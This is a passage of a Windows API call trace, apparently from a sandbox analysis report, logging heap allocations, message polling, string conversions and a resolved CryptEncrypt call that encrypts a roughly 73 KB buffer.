lpMsg=0x8cf3b8) returned 0 [0251.404] CharLowerBuffW (in: lpsz="byte[73464]", cchLength=0xb | out: lpsz="byte[73464]") returned 0xb [0251.404] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0251.408] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0251.408] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0251.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55f80 | out: hHeap=0x970000) returned 1 [0251.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0251.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51820 [0251.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0251.408] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0251.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0251.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0251.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0251.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0251.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0251.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0251.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0251.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0251.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0251.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0251.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0251.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0251.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0251.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0251.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0251.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0251.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0251.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0251.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0251.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0251.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0251.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0251.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0251.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0251.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0251.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0251.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0251.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0251.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0251.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0251.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0251.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0251.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0251.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0251.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0251.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0251.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0251.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0251.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0251.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0251.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0251.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0251.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0251.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0251.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0251.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0251.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0251.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0251.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0251.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0251.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0251.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0251.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0251.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0251.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977cf8 [0251.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0251.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0251.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0251.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0251.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0251.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517d8 [0251.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0251.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0251.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0251.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51850 [0251.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0251.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0251.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0251.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11ef3) returned 0x2e91220 [0251.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0251.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e91220 | out: hHeap=0x970000) returned 1 [0251.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0251.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0251.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51850 | out: hHeap=0x970000) returned 1 [0251.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0251.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51850 [0251.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0251.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0251.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0251.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e558d8 [0251.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0251.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0251.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0251.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0251.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0251.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0251.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0251.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977bd8 [0251.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0251.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0251.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0251.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0251.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0251.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977bd8 | out: hHeap=0x970000) returned 1 [0251.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0251.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0251.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0251.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0251.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0251.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0251.416] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0251.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0251.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0251.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0251.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0251.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0251.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0251.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0251.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0251.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0251.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0251.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0251.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0251.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0251.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0251.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0251.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0251.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0251.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0251.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0251.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0251.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0251.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0251.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0251.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0251.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0251.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0251.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0251.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0251.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0251.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0251.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0251.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0251.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0251.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0251.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0251.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0251.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0251.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0251.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0251.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0251.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0251.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0251.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0251.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0251.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0251.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0251.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0251.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0251.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0251.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0251.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0251.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0251.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0251.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0251.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0251.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0251.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0251.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0251.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0251.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0251.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0251.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0251.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0251.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0251.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0251.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0251.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0251.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0251.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0251.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0251.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0251.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0251.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0251.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0251.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0251.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0251.419] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0251.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e51910 [0251.420] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51910, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0251.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0251.420] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0251.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0251.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0251.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e54440 [0251.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0251.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0251.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0251.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0251.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0251.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0251.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0251.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0251.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0251.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0251.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0251.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0251.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0251.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0251.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0251.421] CryptEncrypt (in: hKey=0xa87250, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e7f320*, pdwDataLen=0x8cef60*=0x11ef3, dwBufLen=0x11ef8 | out: pbData=0x2e7f320*, pdwDataLen=0x8cef60*=0x11ef8) returned 1 [0251.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0251.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0251.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0251.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0251.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0251.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0251.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0251.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0251.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0251.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0251.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0251.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0251.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0251.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0251.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0251.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0251.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0251.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0251.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0251.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0251.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0251.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0251.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0251.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0251.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0251.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0251.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0251.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0251.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0251.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0251.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0251.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0251.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0251.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0251.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0251.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0251.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0251.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 